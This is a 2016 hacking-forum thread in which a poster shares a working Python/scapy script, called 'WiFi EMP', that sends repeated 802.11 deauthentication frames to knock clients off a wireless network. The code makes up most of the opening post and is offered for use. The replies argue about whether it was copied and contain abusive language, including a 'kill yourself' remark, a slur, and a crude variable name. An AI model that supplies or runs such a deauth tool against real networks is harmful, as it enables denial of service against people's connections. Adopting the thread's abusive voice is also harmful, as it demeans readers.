Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


WiFi EMP - Disconnect all clients from WiFi filter_list
Author
Message
WiFi EMP - Disconnect all clients from WiFi #1
Here is a neat little script I wrote a while back.
It simply runs on a device with a WiFi adapter and will disconnect all clients.

This happens by using the broadcast client ID - FF:FF:FF:FF:FF:FF
that will send all packets across any client on the network.

Code:
import sys
import os

class colors:
        GREEN = '\033[92m'
        NORMAL = '\033[0m'
        RED = '\033[91m'
        BLUE = '\033[94m'
        BLERG = '\033[95m'

if len(sys.argv) != 5:
        print 'usage: ./deauth.py interface bssid client count'
        sys.exit(1)


banner = """
___________________ ___________
\______   \_   ___ \\_   _____/
|       _/    \  \/ |    __)_
|    |   \     \____|        \
|____|_  /\______  /_______  /
        \/        \/        \/
__      __._____________.__  
/  \    /  \__\_   _____/|__|  
\   \/\/   /  ||    __)  |  |  
\        /|  ||     \   |  |  
  \__/\  / |__|\___  /   |__|  
       \/          \/          
___________   _____ __________
\_   _____/  /     \\______   \
|    __)_  /  \ /  \|     ___/
|        \/    Y    \    |    
/_______  /\____|__  /____|    
        \/         \/          
"""

print colors.GREEN + banner + colors.NORMAL

raw_input("Please hit enter to continue . . .")

from scapy.all import *

print '| EMP SCRIPT v1.0 |'

conf.iface = sys.argv[1]
bssid = sys.argv[2]
client = sys.argv[3]
amount = sys.argv[4]

conf.verb = 0

rape = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)

for n in range(int(amount)):
    sendp(rape)
    print colors.NORMAL + 'Deauth sent via: ' + colors.BLERG + conf.iface + colors.GREEN + ' to BSSID: ' + colors.RED + bssid + colors.NORMAL + ' Attacking client: ' + colors.BLUE + client + colors.NORMAL

print ''
raw_input("EMP Finished attack hit enter to exit . . .")
os.system("clear")

Hope you find use for this and use it carefully.

[+] 1 user Likes MLP's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #2
Offensive off-hand comment that was removed; don't open if you don't want to read it:
Spoiler:
Kill yourself skid, you didn't write this shit.

All you did was take the code from https://github.com/catalyst256/MyJunk/bl...-deauth.py and add a bunch of pointless shit around it to make it look cooler and more complex.

I'm willing to bet that your RCE "tutorial" isn't originally yours either.

[+] 2 users Like meow's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #3
From my original version that I posted on TeaMp0isoN
http://archive.is/oa1q1

Things can be made twice buddy

[+] 1 user Likes MLP's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #4
(04-19-2016, 02:29 AM)RCE Wrote: From my original version that I posted on TeaMp0isoN
http://archive.is/oa1q1

Things can be made twice buddy

Right.

Things can be made twice, but you're not making anything new by copying and pasting code then adding skid code on the tops and bottoms of it.

[+] 1 user Likes meow's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #5
You can remain on some kind of attack towards my thread that's okay,
everyone can have their opinion and say as they wish.

[+] 1 user Likes MLP's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #6
(04-19-2016, 02:33 AM)RCE Wrote: You can remain on some kind of attack towards my thread that's okay,
everyone can have their opinion and say as they wish.

This is pseudo-intellectualism to the highest degree. I'm not even going to try and argue with you.

Spoiler:
I wish @Reiko was still a mod so that he could ban people for being retarded.

[+] 1 user Likes meow's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #7
Starfall would not have banned me anyway, but nice bro Smile.
Big words

[+] 1 user Likes MLP's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #8
(04-19-2016, 02:36 AM)meow Wrote: This is pseudo-intellectualism to the highest degree. I'm not even going to try and argue with you.

Spoiler:
I wish @Reiko was still a mod so that he could ban people for being retarded.

@"Reiko" probably wouldn't ban him.
[Image: fSEZXPs.png]

[+] 2 users Like Dismas's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #9
thanks! this is great!.
Just what i needed for whenever i need to bash out a de-auth.

well done
[Video: https://www.youtube-nocookie.com/embed/bOkD-HSOmyI]
[bt][1B1sXX2sHhvUrf9Ga9MKcH5e9T4xgN13tB]

[+] 1 user Likes Num5kull's post
Reply

RE: WiFi EMP - Disconnect all clients from WiFi #10
please how can we run this script or how do go about it

thank

Reply







Users browsing this thread: 4 Guest(s)